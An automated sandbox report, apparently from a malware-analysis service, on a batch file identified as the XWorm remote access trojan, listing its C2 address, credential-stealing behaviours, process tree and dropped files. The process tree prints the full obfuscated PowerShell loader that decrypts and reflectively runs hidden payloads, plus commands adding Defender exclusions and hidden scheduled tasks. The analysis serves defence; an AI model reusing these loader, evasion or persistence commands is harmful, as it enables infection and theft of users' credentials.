Analysis

  • max time kernel
    1050s
  • max time network
    1041s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 22:22

General

  • Target

    GenFix.bat

  • Size

    401KB

  • MD5

    396f629fa0f81da870e028d3e8b3b2f1

  • SHA1

    c5e29659587484e3a5e92ebbe93f7cfb9cc2495b

  • SHA256

    9a8ff234164af1f4fb884d68d21b690600b2226db0edda6a1112e09186d2161e

  • SHA512

    56a8f1cffe61fc74cb4713dd621337822f31fcac9ef615d03dcb6f01079847429d24fa7e3c7fe0e01b284fd18b559f76be1d2b00ab9bf699a7a92253aabbfd4e

  • SSDEEP

    12288:b0Gbg7FXZQPlZss3VyceHwDKJrjVzcwwbJi7:b0GomPEYVyZwDsrjJwbc7

Malware Config

Extracted

Family

xworm

C2

press-pairs.gl.at.ply.gg:50154

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • XenArmor Suite

    XenArmor is as suite of password recovery tools for various application.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • ACProtect 1.3x - 1.4x DLL software 5 IoCs

    Detects file using ACProtect software.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 8 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Checks processor information in registry
    • Modifies registry class
    PID:796
    • C:\Windows\System32\mousocoreworker.exe
      C:\Windows\System32\mousocoreworker.exe -Embedding
      2⤵
        PID:2564
      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
        2⤵
          PID:2272
        • C:\Windows\System32\mousocoreworker.exe
          C:\Windows\System32\mousocoreworker.exe -Embedding
          2⤵
            PID:680
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k RPCSS -p
          1⤵
            PID:904
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:956
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:508
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                1⤵
                  PID:1036
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                  1⤵
                    PID:1044
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    1⤵
                      PID:1052
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                      1⤵
                        PID:1064
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1168
                        • C:\Users\Admin\AppData\Roaming\System User
                          "C:\Users\Admin\AppData\Roaming\System User"
                          2⤵
                          • Executes dropped EXE
                          PID:2992
                        • C:\Users\Admin\AppData\Roaming\System User
                          "C:\Users\Admin\AppData\Roaming\System User"
                          2⤵
                          • Executes dropped EXE
                          PID:2072
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                          PID:1208
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1252
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1320
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1328
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1424
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1460
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1496
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1516
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1616
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1676
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1732
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1788
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1796
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1912
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1956
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1964
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:2036
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                            PID:2092
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                            1⤵
                                                              PID:2104
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2144
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2364
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2496
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2504
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:2664
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2740
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2748
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2756
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:3028
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:380
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3356
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  PID:3432
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\GenFix.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2728
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+71Ty1LwEBnP0ZVBQ/IF2UNqO/bkIzg75J/PsqzSWfM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kt9leqxv2w2v5Tpnj9Oyng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Nmiyr=New-Object System.IO.MemoryStream(,$param_var); $NmRGX=New-Object System.IO.MemoryStream; $zueXY=New-Object System.IO.Compression.GZipStream($Nmiyr, [IO.Compression.CompressionMode]::Decompress); $zueXY.CopyTo($NmRGX); $zueXY.Dispose(); $Nmiyr.Dispose(); $NmRGX.Dispose(); $NmRGX.ToArray();}function execute_function($param_var,$param2_var){ $GgRVh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dPtki=$GgRVh.EntryPoint; $dPtki.Invoke($null, $param2_var);}$RKLbf = 'C:\Users\Admin\AppData\Local\Temp\GenFix.bat';$host.UI.RawUI.WindowTitle = $RKLbf;$lWLRP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RKLbf).Split([Environment]::NewLine);foreach ($OABsG in $lWLRP) { if ($OABsG.StartsWith('THECilXilNjYAvuvGzQP')) { $QYGsh=$OABsG.Substring(20); break; }}$payloads_var=[string[]]$QYGsh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                      3⤵
                                                                                        PID:4880
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3396
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_150_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_150.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1400
                                                                                        • C:\Windows\System32\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_150.vbs"
                                                                                          4⤵
                                                                                          • Checks computer location settings
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2160
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_150.bat" "
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4936
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+71Ty1LwEBnP0ZVBQ/IF2UNqO/bkIzg75J/PsqzSWfM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kt9leqxv2w2v5Tpnj9Oyng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Nmiyr=New-Object System.IO.MemoryStream(,$param_var); $NmRGX=New-Object System.IO.MemoryStream; $zueXY=New-Object System.IO.Compression.GZipStream($Nmiyr, [IO.Compression.CompressionMode]::Decompress); $zueXY.CopyTo($NmRGX); $zueXY.Dispose(); $Nmiyr.Dispose(); $NmRGX.Dispose(); $NmRGX.ToArray();}function execute_function($param_var,$param2_var){ $GgRVh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dPtki=$GgRVh.EntryPoint; $dPtki.Invoke($null, $param2_var);}$RKLbf = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_150.bat';$host.UI.RawUI.WindowTitle = $RKLbf;$lWLRP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RKLbf).Split([Environment]::NewLine);foreach ($OABsG in $lWLRP) { if ($OABsG.StartsWith('THECilXilNjYAvuvGzQP')) { $QYGsh=$OABsG.Substring(20); break; }}$payloads_var=[string[]]$QYGsh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                              6⤵
                                                                                                PID:2380
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                6⤵
                                                                                                • Blocklisted process makes network request
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops startup file
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4540
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:3588
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:3824
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:952
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:1080
                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
                                                                                                  7⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:1988
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c Cd %temp% && All-In-One.exe OutPut.json
                                                                                                  7⤵
                                                                                                    PID:2068
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
                                                                                                      All-In-One.exe OutPut.json
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Accesses Microsoft Outlook accounts
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4536
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3564
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                          1⤵
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:4308
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                          1⤵
                                                                                            PID:3424
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:744
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:2652
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:3160
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                1⤵
                                                                                                  PID:1888
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                  1⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  PID:384
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                  1⤵
                                                                                                    PID:3372

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System User.log

                                                                                                    Filesize

                                                                                                    3KB

                                                                                                    MD5

                                                                                                    06d16fea6ab505097d16fcaa32949d47

                                                                                                    SHA1

                                                                                                    0c1c719831fa41cd102d0d72d61c0f46ec5b8de8

                                                                                                    SHA256

                                                                                                    54e15de2bef9f651d7717e2a336ac6b2ea2b723e6f29d2b153d8fbbc89aef723

                                                                                                    SHA512

                                                                                                    03c00f1eebb51cec11703141ae9d9c3ac589f5495bc04d8a4b043714089a9d50bd3a520e4d72b4a4c99f5b9bf5f689bf2585fa5c7d4ddbe6f71cbba0172f593a

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                    Filesize

                                                                                                    3KB

                                                                                                    MD5

                                                                                                    661739d384d9dfd807a089721202900b

                                                                                                    SHA1

                                                                                                    5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                    SHA256

                                                                                                    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                    SHA512

                                                                                                    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                    Filesize

                                                                                                    53KB

                                                                                                    MD5

                                                                                                    a26df49623eff12a70a93f649776dab7

                                                                                                    SHA1

                                                                                                    efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                    SHA256

                                                                                                    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                    SHA512

                                                                                                    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                    Filesize

                                                                                                    2KB

                                                                                                    MD5

                                                                                                    005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                    SHA1

                                                                                                    0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                    SHA256

                                                                                                    342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                    SHA512

                                                                                                    f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                    Filesize

                                                                                                    3KB

                                                                                                    MD5

                                                                                                    4f239c22043f041a286840e8ba6b42ca

                                                                                                    SHA1

                                                                                                    f5ce9f183af9985b72be0545adc482ffb50ff6bd

                                                                                                    SHA256

                                                                                                    baa9cd46bbcac4fc61c955b95b1c3a0b0ae2d5dd451762e19a6c67688ce48bdf

                                                                                                    SHA512

                                                                                                    aad5a3530b8b81bac2fafdd1b64029976ddec76c137fbb221c9ee3e688dec3bf4ae7ec72b21547112db9d7bb7324f2ccd242ca8adf7e557633bc659b41bd4a32

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    1b43a808284da8d61503dd6c6c863794

                                                                                                    SHA1

                                                                                                    f269c29d64fda3ea16d08a9a5edb7f613c83ad37

                                                                                                    SHA256

                                                                                                    2735c36eb4646feaf972bebd02779727a8ca66de4389477297ace0976b143349

                                                                                                    SHA512

                                                                                                    17204e5295be8d6a76e615cf3631c183b0bba392aff1dc11149e2521bd87e07fe50f67efb6d1d16c44034eb62c947f6c67cfc7b2877221ef7f0789be69760104

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Filesize

                                                                                                    944B

                                                                                                    MD5

                                                                                                    77d622bb1a5b250869a3238b9bc1402b

                                                                                                    SHA1

                                                                                                    d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                                    SHA256

                                                                                                    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                                    SHA512

                                                                                                    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Filesize

                                                                                                    944B

                                                                                                    MD5

                                                                                                    3072fa0040b347c3941144486bf30c6f

                                                                                                    SHA1

                                                                                                    e6dc84a5bd882198583653592f17af1bf8cbfc68

                                                                                                    SHA256

                                                                                                    da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e

                                                                                                    SHA512

                                                                                                    62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Filesize

                                                                                                    944B

                                                                                                    MD5

                                                                                                    ee9f1be5d4d351a5c376b370adcf0eea

                                                                                                    SHA1

                                                                                                    1779cecfb13c6a2f0f2813ae65d0d91ebdcf5583

                                                                                                    SHA256

                                                                                                    70600f0f93bca5f0548bfe5503513caadda31cbcd14dc007824b0925a8626e4b

                                                                                                    SHA512

                                                                                                    fda7345f64a6352e99bb3f5d94e58751a71d45a27147f60da32d12ff0307dbe416f482f1b9950e52ce63cbb5f0e5c1647f72dbb7a05c5419ccd8b7980ea86754

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\All-In-One.exe

                                                                                                    Filesize

                                                                                                    5.1MB

                                                                                                    MD5

                                                                                                    a48e3197ab0f64c4684f0828f742165c

                                                                                                    SHA1

                                                                                                    f935c3d6f9601c795f2211e34b3778fad14442b4

                                                                                                    SHA256

                                                                                                    baecc747370a4c396ef5403a3a2b286465d8fe4677bf1bfd23b8164ef5c22bbb

                                                                                                    SHA512

                                                                                                    e0b0b73c39850a30aac89f84f721c79f863612f596d6ff3df0860a9faf743a81364656773c99708e9c0656c74b6a278b6bf7e648f7ff1b9080f9a21e10515a59

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-conio-l1-1-0_not.dll

                                                                                                    Filesize

                                                                                                    18KB

                                                                                                    MD5

                                                                                                    6ea692f862bdeb446e649e4b2893e36f

                                                                                                    SHA1

                                                                                                    84fceae03d28ff1907048acee7eae7e45baaf2bd

                                                                                                    SHA256

                                                                                                    9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2

                                                                                                    SHA512

                                                                                                    9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                    Filesize

                                                                                                    21KB

                                                                                                    MD5

                                                                                                    72e28c902cd947f9a3425b19ac5a64bd

